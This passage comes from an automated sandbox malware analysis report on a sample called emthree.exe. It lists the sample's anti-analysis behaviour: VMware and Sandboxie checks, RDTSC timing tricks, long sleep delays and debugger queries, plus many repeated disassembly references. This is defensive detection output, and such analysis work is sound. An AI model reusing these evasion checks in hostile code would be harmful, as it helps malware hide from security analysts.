          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: emthree.exe PID: 4600, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\emthree.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\emthree.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000002D998E4 second address: 0000000002D998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000002D99B5E second address: 0000000002D99B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\emthree.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\emthree.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\emthree.exeWindow / User API: threadDelayed 368
          Source: C:\Users\user\Desktop\emthree.exeWindow / User API: threadDelayed 820
          Source: C:\Users\user\Desktop\emthree.exe TID: 4612Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Users\user\Desktop\emthree.exe TID: 6000Thread sleep time: -41500s >= -30000s
          Source: C:\Users\user\Desktop\emthree.exe TID: 2872Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1268Thread sleep count: 35 > 30
          Source: C:\Windows\explorer.exe TID: 1268Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: explorer.exe, 00000002.00000000.260477578.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000002.494634416.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000002.00000000.241832967.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.260992522.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.253126007.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.260992522.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\emthree.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\emthree.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01004120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01004120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01004120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01004120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01004120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01012990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01067016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01067016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01067016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01000050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01000050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01063884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01063884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01013B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01013B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0109D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01012397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01014BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01014BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01014BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010923E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010923E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010923E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01003A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01024A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01024A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01074257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0109B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0109B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0102927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01012ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01012AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
